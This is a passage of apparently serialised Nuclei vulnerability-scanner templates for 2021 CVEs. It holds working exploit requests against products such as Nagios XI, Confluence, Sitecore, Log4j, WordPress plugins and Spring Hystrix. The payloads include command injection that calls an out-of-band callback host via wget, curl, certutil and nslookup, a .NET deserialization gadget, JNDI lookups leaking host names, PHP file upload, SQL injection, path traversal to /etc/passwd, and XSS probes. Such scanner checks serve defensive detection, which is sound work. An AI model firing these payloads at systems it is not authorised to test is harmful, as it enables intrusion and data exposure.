Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/reset/IjEi.YhAmmQ.cdQp7CnnVq02aQ05y8tSBddl-qs","{{BaseURL}}/redash/reset/IjEi.YhAmmQ.cdQp7CnnVq02aQ05y8tSBddl-qs"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Enter your new password:","redash"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25297","info":{"name":"Nagios 5.5.6-5.7.5 - Authenticated Remote Command Injection","severity":"high"},"requests":[{"raw":["GET /nagiosxi/login.php HTTP/1.1\nHost: {{Hostname}}\n","POST /nagiosxi/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnsp={{nsp}}&pageopt=login&username={{username}}&password={{password}}\n","GET /nagiosxi/index.php HTTP/1.1\nHost: {{Hostname}}\n","@timeout: 20s\nGET /nagiosxi/config/monitoringwizard.php?update=1&nsp={{nsp_auth}}&nextstep=3&wizard=switch&ip_address=127.0.0.1%22%3b%20wget%20{{interactsh-url}}%3b&snmpopts%5bsnmpcommunity%5d=public&scaninterfaces=on HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body_4","words":["<b>Ping</b>","Switch Details"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"nsp","group":1,"regex":["name=['\"]nsp['\"] value=['\"](.*)['\"]>"],"internal":true,"part":"body"},{"type":"regex","name":"nsp_auth","group":1,"regex":["var nsp_str = ['\"](.*)['\"];"],"internal":true,"part":"body"}]}]},{"id":"CVE-2021-32820","info":{"name":"Express-handlebars - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/?layout=/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:","daemon:[x*]:0:0:","operator:[x*]:0:0:"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-26084","info":{"name":"Confluence Server - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /{{path}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nqueryString=aaaa\\u0027%2b#{16*8787}%2b\\u0027bbb\n"],"payloads":{"path":["pages/createpage-entervariables.action?SpaceKey=x","pages/createpage-entervariables.action","confluence/pages/createpage-entervariables.action?SpaceKey=x","confluence/pages/createpage-entervariables.action","wiki/pages/createpage-entervariables.action?SpaceKey=x","wiki/pages/createpage-entervariables.action","pages/doenterpagevariables.action","pages/createpage.action?spaceKey=myproj","pages/templates2/viewpagetemplate.action","pages/createpage-entervariables.action","template/custom/content-editor","templates/editor-preload-container","users/user-dark-features"]},"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["value=\"aaaa{140592=null}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24891","info":{"name":"WordPress Elementor Website Builder <3.1.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/elementor/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","words":["Elementor Website Builder","Elementor Page Builder"],"internal":true}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/elementor/assets/js/frontend.min.js"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["compare_versions(version, '> 1.5.0', '< 3.1.4')"]},{"type":"regex","part":"body","regex":["elementor[\\s-]*v(([0-3]+\\.(([0-5]+\\.[0-5]+)|[0-4]+\\.[0-9]+))|[0-2]+[0-9.]+)"]}],"extractors":[{"type":"regex","name":"version","group":1,"regex":["elementor[\\s-]*v(([0-3]+\\.(([0-5]+\\.[0-5]+)|[0-4]+\\.[0-9]+))|[0-2]+[0-9.]+)"],"internal":true},{"type":"kval","kval":["version"]}]}]},{"id":"CVE-2021-24155","info":{"name":"WordPress BackupGuard <1.6.0 - Authenticated Arbitrary File Upload","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=backup_guard_backups HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/admin-ajax.php?action=backup_guard_importBackup&token={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json, text/javascript, */*; q=0.01\nContent-Type: multipart/form-data; boundary=---------------------------204200867127808062083805313921\n\n-----------------------------204200867127808062083805313921\nContent-Disposition: form-data; name=\"files[]\"; filename=\"{{randstr}}.php\"\nContent-Type: application/x-php\n\n<?php\n\necho \"CVE-2021-24155\";\n\n?>\n\n-----------------------------204200867127808062083805313921--\n","GET /wp-content/uploads/backup-guard/{{randstr}}.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(header_4, \"text/html\")","status_code_4 == 200","contains(body_3, '{\\\"success\\\":1}')","contains(body_4, 'CVE-2021-24155')"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["BG_BACKUP_STRINGS = {\"nonce\":\"([0-9a-zA-Z]+)\"};"],"internal":true}]}]},{"id":"CVE-2021-45968","info":{"name":"Pascom CPS  - Local File Inclusion","severity":"high"},"requests":[{"raw":["GET /services/pluginscript/ HTTP/1.1\nHost: {{Hostname}}\nGET /services/pluginscript/..;/..;/ HTTP/1.1\nHost: {{Hostname}}\nGET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 != status_code_1"],"condition":"and"}]}]},{"id":"CVE-2021-30134","info":{"name":"Php-mod/curl Library <2.3.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/vendor/curl/curl/tests/server/php-curl-test/post_file_path_upload.php?key=<img%20src%20onerror%3dalert(document.domain)>"],"matchers-condition":"and","matchers":[{"type":"word","words":["key\":\"<img src onerror=alert(document.domain)>\""]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-40970","info":{"name":"Spotweb <= 1.5.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST /install.php?page=1 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsettingsform[username]=pdteam'+onclick='alert(document.domain)\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["onclick='alert(document.domain)","Spotweb"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-41826","info":{"name":"PlaceOS 1.2109.1 - Open Redirection","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/auth/logout?continue=//interact.sh"],"matchers-condition":"and","matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]},{"type":"status","status":[302,301],"condition":"or"}]}]},{"id":"CVE-2021-46417","info":{"name":"Franklin Fueling Systems Colibri Controller Module 1.8.19.8580 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/tsaupload.cgi?file_name=../../../../../..//etc/passwd&password="],"matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2021-22053","info":{"name":"Spring Cloud Netflix Hystrix Dashboard <2.2.10 - Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/hystrix/;a=a/__${T (java.lang.Runtime).getRuntime().exec(\"curl http://{{interactsh-url}}\")}__::.x/","{{BaseURL}}/hystrix/;a=a/__${T (java.lang.Runtime).getRuntime().exec(\"certutil -urlcache -split -f http://{{interactsh-url}}\")}__::.x/"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"regex","part":"interactsh_request","regex":["User-Agent: (curl|CertUtil)"]}]}]},{"id":"CVE-2021-24435","info":{"name":"WordPress Titan Framework plugin <= 1.12.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/titan-framework/lib/iframe-font-preview.php?font-type=google&font-family=%27/onerror=%27alert(document.domain)%27/b=%27","{{BaseURL}}/titan-framework/lib/iframe-font-preview.php?font-type=google&font-family=aaaaa&font-weight=%27%20onerror=alert(document.domain)%20b=%27","{{BaseURL}}/titan-framework/lib/iframe-font-preview.php?font-type=google&font-family=aaaaa&font-weight=%27%20accesskey=%27x%27%20onclick=%27alert(document.domain)%27%20class=%27"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"regex","regex":["(?i)(onerror=|onclick=)['\"]?alert\\(document\\.domain\\)['\"]?","<p>Grumpy wizards make"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-27309","info":{"name":"Clansphere CMS 2011.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/mods/clansphere/lang_modvalidate.php?language=language&module=module%22></script><script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"></script><script>alert(document.domain)</script>.php"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-21799","info":{"name":"Advantech R-SeeNet 2.4.12 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/php/telnet_form.php?hostname=%3C%2Ftitle%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Ctitle%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<title>Telnet </title><script>alert(document.domain)</script><title></title>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24237","info":{"name":"WordPress Realteo <=1.2.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/properties/?keyword_search=--!%3E%22%20autofocus%20onfocus%3Dalert(/{{randstr}}/)%3B%2F%2F"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["autofocus onfocus=alert(/{{randstr}}/);//","Nothing found"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-43496","info":{"name":"Clustering Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/img/../../../../../../etc/passwd"],"matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2021-44515","info":{"name":"Zoho ManageEngine Desktop Central - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /STATE_ID/123/agentLogUploader HTTP/1.1\nHost: {{Hostname}}\nCookie: STATE_COOKIE=&_REQS/_TIME/123\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["len(body) == 0"]},{"type":"word","part":"header","words":["UEMJSESSIONID="]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25074","info":{"name":"WordPress WebP Converter for Media < 4.0.3 - Unauthenticated Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/webp-converter-for-media/includes/passthru.php?src=https://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2021-40978","info":{"name":"MKdocs 1.2.2 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:[x*]:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-42237","info":{"name":"Sitecore Experience Platform Pre-Auth RCE","severity":"critical"},"requests":[{"raw":["POST /sitecore/shell/ClientBin/Reporting/Report.ashx HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/xml\n\n<?xml version=\"1.0\" ?>\n<a>\n    <query></query>\n    <source>foo</source>\n    <parameters>\n        <parameter name=\"\">\n            <ArrayOfstring z:Id=\"1\" z:Type=\"System.Collections.Generic.SortedSet`1[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]\" z:Assembly=\"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089\"\n                xmlns=\"http://schemas.microsoft.com/2003/10/Serialization/Arrays\"\n                xmlns:i=\"http://www.w3.org/2001/XMLSchema-instance\"\n                xmlns:x=\"http://www.w3.org/2001/XMLSchema\"\n                xmlns:z=\"http://schemas.microsoft.com/2003/10/Serialization/\">\n                <Count z:Id=\"2\" z:Type=\"System.Int32\" z:Assembly=\"0\"\n                    xmlns=\"\">2</Count>\n                <Comparer z:Id=\"3\" z:Type=\"System.Collections.Generic.ComparisonComparer`1[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]\" z:Assembly=\"0\"\n                    xmlns=\"\">\n                    <_comparison z:Id=\"4\" z:FactoryType=\"a:DelegateSerializationHolder\" z:Type=\"System.DelegateSerializationHolder\" z:Assembly=\"0\"\n                        xmlns=\"http://schemas.datacontract.org/2004/07/System.Collections.Generic\"\n                        xmlns:a=\"http://schemas.datacontract.org/2004/07/System\">\n                        <Delegate z:Id=\"5\" z:Type=\"System.DelegateSerializationHolder+DelegateEntry\" z:Assembly=\"0\"\n                            xmlns=\"\">\n                            <a:assembly z:Id=\"6\">mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</a:assembly>\n                            <a:delegateEntry z:Id=\"7\">\n                                <a:assembly z:Ref=\"6\" i:nil=\"true\"/>\n                                <a:delegateEntry i:nil=\"true\"/>\n                                <a:methodName z:Id=\"8\">Compare</a:methodName>\n                                <a:target i:nil=\"true\"/>\n                                <a:targetTypeAssembly z:Ref=\"6\" i:nil=\"true\"/>\n                                <a:targetTypeName z:Id=\"9\">System.String</a:targetTypeName>\n                                <a:type z:Id=\"10\">System.Comparison`1[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]</a:type>\n                            </a:delegateEntry>\n                            <a:methodName z:Id=\"11\">Start</a:methodName>\n                            <a:target i:nil=\"true\"/>\n                            <a:targetTypeAssembly z:Id=\"12\">System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</a:targetTypeAssembly>\n                            <a:targetTypeName z:Id=\"13\">System.Diagnostics.Process</a:targetTypeName>\n                            <a:type z:Id=\"14\">System.Func`3[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]</a:type>\n                        </Delegate>\n                        <method0 z:Id=\"15\" z:FactoryType=\"b:MemberInfoSerializationHolder\" z:Type=\"System.Reflection.MemberInfoSerializationHolder\" z:Assembly=\"0\"\n                            xmlns=\"\"\n                            xmlns:b=\"http://schemas.datacontract.org/2004/07/System.Reflection\">\n                            <Name z:Ref=\"11\" i:nil=\"true\"/>\n                            <AssemblyName z:Ref=\"12\" i:nil=\"true\"/>\n                            <ClassName z:Ref=\"13\" i:nil=\"true\"/>\n                            <Signature z:Id=\"16\" z:Type=\"System.String\" z:Assembly=\"0\">System.Diagnostics.Process Start(System.String, System.String)</Signature>\n                            <Signature2 z:Id=\"17\" z:Type=\"System.String\" z:Assembly=\"0\">System.Diagnostics.Process Start(System.String, System.String)</Signature2>\n                            <MemberType z:Id=\"18\" z:Type=\"System.Int32\" z:Assembly=\"0\">8</MemberType>\n                            <GenericArguments i:nil=\"true\"/>\n                        </method0>\n                        <method1 z:Id=\"19\" z:FactoryType=\"b:MemberInfoSerializationHolder\" z:Type=\"System.Reflection.MemberInfoSerializationHolder\" z:Assembly=\"0\"\n                            xmlns=\"\"\n                            xmlns:b=\"http://schemas.datacontract.org/2004/07/System.Reflection\">\n                            <Name z:Ref=\"8\" i:nil=\"true\"/>\n                            <AssemblyName z:Ref=\"6\" i:nil=\"true\"/>\n                            <ClassName z:Ref=\"9\" i:nil=\"true\"/>\n                            <Signature z:Id=\"20\" z:Type=\"System.String\" z:Assembly=\"0\">Int32 Compare(System.String, System.String)</Signature>\n                            <Signature2 z:Id=\"21\" z:Type=\"System.String\" z:Assembly=\"0\">System.Int32 Compare(System.String, System.String)</Signature2>\n                            <MemberType z:Id=\"22\" z:Type=\"System.Int32\" z:Assembly=\"0\">8</MemberType>\n                            <GenericArguments i:nil=\"true\"/>\n                        </method1>\n                    </_comparison>\n                </Comparer>\n                <Version z:Id=\"23\" z:Type=\"System.Int32\" z:Assembly=\"0\"\n                    xmlns=\"\">2</Version>\n                <Items z:Id=\"24\" z:Type=\"System.String[]\" z:Assembly=\"0\" z:Size=\"2\"\n                    xmlns=\"\">\n                    <string z:Id=\"25\"\n                        xmlns=\"http://schemas.microsoft.com/2003/10/Serialization/Arrays\">/c nslookup {{interactsh-url}}</string>\n                    <string z:Id=\"26\"\n                        xmlns=\"http://schemas.microsoft.com/2003/10/Serialization/Arrays\">cmd</string>\n                </Items>\n            </ArrayOfstring>\n        </parameter>\n    </parameters>\n</a>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["System.ArgumentNullException"]}]}]},{"id":"CVE-2021-24275","info":{"name":"Popup by Supsystic <1.10.5 - Cross-Site scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin.php?page=popup-wp-supsystic&tab=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","words":["</script><script>alert(document.domain)</script>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25118","info":{"name":"Yoast SEO 16.7-17.2 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-json/wp/v2/posts?per_page=1"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"regex","regex":["\"path\":\"(.*)/wp-content\\\\(.*)\",\"size"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","group":1,"regex":["\"path\":\"(.*)/wp-content\\\\(.*)\",\"size"],"part":"body"}]}]},{"id":"CVE-2021-24987","info":{"name":"WordPress Super Socializer <7.13.30 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=the_champ_sharing_count&urls[]=<img%20src=x%20onerror=alert(document.domain)>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{\"facebook_urls\":[[\"<img src=x onerror=alert(document.domain)>\"]]"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24407","info":{"name":"WordPress Jannah Theme <5.4.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["/wp-content/themes/jannah/assets/","attachment-jannah-image-"],"condition":"or"}]},{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\n\naction=tie_ajax_search&query[]=</script><script>alert(document.domain)</script>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-45046","info":{"name":"Apache Log4j2 - Remote Code Injection","severity":"critical"},"requests":[{"raw":["GET /?x=${jndi:ldap://127.0.0.1#.${hostName}.{{interactsh-url}}/a} HTTP/1.1\nHost: {{Hostname}}\nAccept: ${jndi:ldap://127.0.0.1#.${hostName}.accept.{{interactsh-url}}}\nAccept-Encoding: ${jndi:ldap://127.0.0.1#.${hostName}.acceptencoding.{{interactsh-url}}}\nAccept-Language: ${jndi:ldap://127.0.0.1#.${hostName}.acceptlanguage.{{interactsh-url}}}\nAccess-Control-Request-Headers: ${jndi:ldap://127.0.0.1#.${hostName}.accesscontrolrequestheaders.{{interactsh-url}}}\nAccess-Control-Request-Method: ${jndi:ldap://127.0.0.1#.${hostName}.accesscontrolrequestmethod.{{interactsh-url}}}\nAuthentication: Basic ${jndi:ldap://127.0.0.1#.${hostName}.authenticationbasic.{{interactsh-url}}}\nAuthentication: Bearer ${jndi:ldap://127.0.0.1#.${hostName}.authenticationbearer.{{interactsh-url}}}\nCookie: ${jndi:ldap://127.0.0.1#.${hostName}.cookiename.{{interactsh-url}}}=${jndi:ldap://${hostName}.cookievalue.{{interactsh-url}}}\nLocation: ${jndi:ldap://127.0.0.1#.${hostName}.location.{{interactsh-url}}}\nOrigin: ${jndi:ldap://127.0.0.1#.${hostName}.origin.{{interactsh-url}}}\nReferer: ${jndi:ldap://127.0.0.1#.${hostName}.referer.{{interactsh-url}}}\nUpgrade-Insecure-Requests: ${jndi:ldap://127.0.0.1#.${hostName}.upgradeinsecurerequests.{{interactsh-url}}}\nUser-Agent: ${jndi:ldap://127.0.0.1#.${hostName}.useragent.{{interactsh-url}}}\nX-Api-Version: ${jndi:ldap://127.0.0.1#.${hostName}.xapiversion.{{interactsh-url}}}\nX-CSRF-Token: ${jndi:ldap://127.0.0.1#.${hostName}.xcsrftoken.{{interactsh-url}}}\nX-Druid-Comment: ${jndi:ldap://127.0.0.1#.${hostName}.xdruidcomment.{{interactsh-url}}}\nX-Forwarded-For: ${jndi:ldap://127.0.0.1#.${hostName}.xforwardedfor.{{interactsh-url}}}\nX-Origin: ${jndi:ldap://127.0.0.1#.${hostName}.xorigin.{{interactsh-url}}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"regex","part":"interactsh_request","regex":["\\d{3}\\.\\d{1}\\.\\d{1}\\.\\d{1}\\.([a-zA-Z0-9\\.\\-]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.\\w+"]}],"extractors":[{"type":"kval","kval":null},{"type":"regex","group":2,"regex":["\\d{3}\\.\\d{1}\\.\\d{1}\\.\\d{1}\\.([a-zA-Z0-9\\.\\-]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.\\w+"]},{"type":"regex","group":1,"regex":["\\d{3}\\.\\d{1}\\.\\d{1}\\.\\d{1}\\.([a-zA-Z0-9\\.\\-]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.\\w+"],"part":"interactsh_request"}]}]},{"id":"CVE-2021-46068","info":{"name":"Vehicle Service Management System - Stored Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /classes/Login.php?f=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nusername={{username}}&password={{password}}\n","POST /classes/Users.php?f=save HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nid=1&firstname=Administrator%22%3e%3cscript%3ealert%28document.domain%29%3c%2fscript%3e&lastname=Admin&username=admin\n","GET /admin/?page=user HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(header_3, 'text/html')","status_code_3 == 200","contains(body_3, \"Administrator\\\"><script>alert(document.domain)</script> Admin\")"],"condition":"and"}]}]},{"id":"CVE-2021-46419","info":{"name":"Telesquare TLR-2855KS6 - Arbitrary File Deletion","severity":"critical"},"requests":[{"raw":["PUT /cgi-bin/{{filename}}.txt HTTP/1.1\nHost: {{Hostname}}\nDNT: 1\n\n{{randstr}}\n","DELETE /cgi-bin/{{filename}}.txt HTTP/1.1\nHost: {{Hostname}}\nDNT: 1\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["status_code_1 == 201 && status_code_2 == 204","contains(server_1, \"lighttpd\")"],"condition":"and"}]}]},{"id":"CVE-2021-44077","info":{"name":"Zoho ManageEngine ServiceDesk Plus - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/RestAPI/ImportTechnicians"],"matchers-condition":"and","matchers":[{"type":"word","words":["<form name=\"ImportTechnicians\""]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-20124","info":{"name":"Draytek VigorConnect 6.0-B3 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/ACSServer/WebServlet?act=getMapImg_acs2&filename=../../../../../../../etc/passwd","{{BaseURL}}/ACSServer/WebServlet?act=getMapImg_acs2&filename=../../../../../../../windows/win.ini"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/octet-stream"]},{"type":"regex","regex":["root:.*:0:0:","for 16-bit app support"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24943","info":{"name":"Registrations for the Events Calendar < 2.7.6 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 20s\nPOST /wp-admin/admin-ajax.php?action=rtec_send_unregister_link HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nevent_id=3 AND (SELECT 1874 FROM (SELECT(SLEEP(5)))vNpy)&email={{text}}@{{text}}.com\n"],"matchers":[{"type":"dsl","dsl":["duration>=5","status_code == 200","contains(body, \"Please enter the email you registered with\")"],"condition":"and"}]}]},{"id":"CVE-2021-24286","info":{"name":"WordPress Plugin Redirect 404 to Parent 1.3.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/options-general.php?page=moove-redirect-settings&tab=%22+style%3Danimation-name%3Arotation+onanimationstart%3D%22alert%28document.domain%29%3B HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(content_type_2, \"text/html\")","contains(body_2, \"alert%28document.domain%29\") && contains(body_2, \"Moove redirect 404\")","status_code_2 == 200"],"condition":"and"}]}]},{"id":"CVE-2021-37704","info":{"name":"phpfastcache - phpinfo Resource Exposure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/vendor/phpfastcache/phpfastcache/docs/examples/phpinfo.php","{{BaseURL}}/vendor/phpfastcache/phpfastcache/examples/phpinfo.php"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","words":["PHP Extension","PHP Version"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","group":1,"regex":[">PHP Version <\\/td><td class=\"v\">([0-9.]+)"],"part":"body"}]}]},{"id":"CVE-2021-27561","info":{"name":"YeaLink DM 3.6.0.20 - Remote Command Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/premise/front/getPingData?url=http://0.0.0.0:9600/sm/api/v1/firewall/zone/services?zone=;/usr/bin/id;"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["uid","gid","groups"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","regex":["(u|g)id=.*"]}]}]},{"id":"CVE-2021-1497","info":{"name":"Cisco HyperFlex HX Data Platform - Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /auth/change HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\nusername=root&password={{url_encode(payload)}}\n","POST /auth HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\nusername=root&password={{url_encode(payload)}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: {{useragent}}"]}]}]},{"id":"CVE-2021-42063","info":{"name":"SAP Knowledge Warehouse <=7.5.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/SAPIrExtHelp/random/SAPIrExtHelp/random/%22%3e%3c%53%56%47%20%4f%4e%4c%4f%41%44%3d%26%23%39%37%26%23%31%30%38%26%23%31%30%31%26%23%31%31%34%26%23%31%31%36%28%26%23%78%36%34%26%23%78%36%66%26%23%78%36%33%26%23%78%37%35%26%23%78%36%64%26%23%78%36%35%26%23%78%36%65%26%23%78%37%34%26%23%78%32%65%26%23%78%36%34%26%23%78%36%66%26%23%78%36%64%26%23%78%36%31%26%23%78%36%39%26%23%78%36%65%29%3e.asp"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<SVG ONLOAD=&#97&#108&#101&#114&#116(&#X64&#X6F&#X63&#X75&#X6D&#X65&#X6E&#X74&#X2E&#X64&#X6F&#X6D&#X61&#X69&#X6E)>","SAPIKS2"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-21315","info":{"name":"Node.JS System Information Library <5.3.1 - Remote Command 